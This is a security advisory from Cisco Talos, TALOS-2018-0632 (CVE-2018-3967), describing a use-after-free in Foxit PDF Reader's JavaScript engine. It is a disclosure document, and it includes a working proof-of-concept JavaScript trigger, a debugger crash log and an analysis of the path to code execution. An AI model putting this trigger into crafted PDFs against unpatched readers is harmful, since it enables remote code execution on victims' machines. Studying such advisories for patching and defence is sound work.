Talos Vulnerability Report

TALOS-2018-0632

Foxit PDF Reader JavaScript this.event.target Remote Code Execution Vulnerability

October 1, 2018
CVE Number

CVE-2018-3967

Summary

An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

Tested Versions

Foxit Software Foxit PDF Reader 9.1.0.5096.

Product URLs

https://www.foxitsoftware.com/products/pdf-reader/

CVSSv3 Score

8.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416: Use After Free

Details

Foxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.

When executing embedded JavaScript code, a document can be closed, which frees numerous used objects, but the JavaScript can continue to run. Direct access to a now-freed object can lead to a use-after-free condition, which can be abused to execute arbitrary code. It should be noted that closeDoc method requires higher privileges so either the document needs to come from a thrusted location or the user must click a dialog that allows it to run.

This particular vulnerability lies in accessing saved reference to this.event.target object, which can trigger a use-after-free condition like in the following code:

function f2() {
app.activeDocs[0].closeDoc();
this.event["target"].toString = f2;
}

function f1(){}
f2();

In the above code, after closing the current document, a large number of objects are freed. By modifying the toString method of this.event.target object, we trigger a use after free with the following crash:

(cc4.de4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0e7d2da8 ecx=085a2a58 edx=00000000 esi=128c5f60 edi=12fbcf28
eip=0178ce77 esp=002ce9b0 ebp=002ce9e8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
FoxitReader!CryptVerifyMessageSignature+0x1a55c7:
0178ce77 8b13            mov     edx,dword ptr [ebx]  ds:0023:0e7d2da8=????????
0:000> !heap -p -a ebx
    address 0e7d2da8 found in
    _DPH_HEAP_ROOT @ 7751000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    e702a28:          e7d2000             2000
    6a0d90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77d869cc ntdll!RtlDebugFreeHeap+0x0000002f
    77d49e07 ntdll!RtlpFreeHeap+0x0000005d
    77d163a6 ntdll!RtlFreeHeap+0x00000142
    76ccc614 kernel32!HeapFree+0x00000014
    02a8df1b FoxitReader!CryptVerifyMessageSignature+0x014a666b
    00f808bf FoxitReader+0x000d08bf
    00f828a8 FoxitReader+0x000d28a8
    010c965e FoxitReader+0x0021965e
0:000> u
FoxitReader!CryptVerifyMessageSignature+0x1a55c7:
0178ce77 8b13            mov     edx,dword ptr [ebx]
0178ce79 8b4208          mov     eax,dword ptr [edx+8]
0178ce7c 8bcb            mov     ecx,ebx
0178ce7e ffd0            call    eax
0178ce80 83f801          cmp     eax,1
0178ce83 8b4608          mov     eax,dword ptr [esi+8]
0178ce86 750f            jne     FoxitReader!CryptVerifyMessageSignature+0x1a55e7 (0178ce97)
0178ce88 83f80c          cmp     eax,0Ch

Access violation happens when accessing memory pointed to by ebx which points to a free memory location. If this memory location is placed under attacker control, double dereference could lead to control over contents of eax which is used in a call instruction, thus leading to arbitrary code execution.

Timeline

2018-07-16 - Vendor Disclosure
2018-09-28 - Vendor Patched
2018-10-01 - Public Release

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.